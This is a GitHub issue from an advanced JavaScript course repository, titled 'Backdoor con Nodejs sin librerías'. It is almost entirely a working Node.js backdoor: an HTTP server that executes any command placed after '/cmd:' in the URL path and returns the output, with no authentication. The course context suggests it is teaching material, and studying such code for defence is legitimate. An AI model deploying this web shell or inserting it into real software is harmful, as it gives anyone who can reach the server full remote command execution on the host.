search

Fictizia / Curso-JS-Avanzado-para-desarrolladores-Front-end_ed4

FICTIZIA » JavaScript Avanzado para desarrolladores Front-end — 4ª Edición
http://www.fictizia.com/formacion/curso_javascript_avanzado
GNU Affero General Public License v3.0
35 stars 20 forks source link

Backdoor con Nodejs sin librerías #24

Closed UlisesGascon closed 5 years ago

UlisesGascon commented 5 years ago 
const http = require('http'),
    url = require('url'),
    { exec } = require('child_process');

const puerto = process.env.PORT;
const direccion = process.env.IP;

http.createServer((req, res) => {
    const pathname = url.parse(req.url).pathname;

  if(pathname.includes("/cmd:")){
    const cmd = decodeURIComponent(pathname.split("/cmd:")[1]);
    exec(cmd, (err, stdout, stderr) => {
      res.writeHead(200, {'Content-Type': 'application/json'});
      res.end(JSON.stringify({err, stdout, stderr}, null, 4));
    });
  } else {
      res.writeHead(200, {'Content-Type': 'text/plain'});
      res.end(pathname);
  }
}).listen(puerto, direccion);
console.log(`Server running at http://${direccion}:${puerto}/`);